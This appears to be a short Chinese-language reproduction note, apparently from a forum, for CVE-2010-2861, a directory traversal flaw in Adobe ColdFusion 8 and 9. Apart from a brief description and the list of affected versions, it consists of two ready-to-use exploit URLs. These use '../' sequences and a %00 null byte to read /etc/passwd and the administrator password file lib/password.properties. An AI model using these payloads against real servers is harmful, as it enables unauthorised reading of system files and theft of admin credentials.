CVE-2010-2861 Adobe ColdFusion 文件读取漏洞
漏洞简介
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
漏洞影响
Adobe ColdFusion 8
Adobe ColdFusion 9
复现过程
直接访问
http://url:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en,即可读取文件/etc/passwd:
读取后台管理员密码
http://url:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en:
请登录后查看回复内容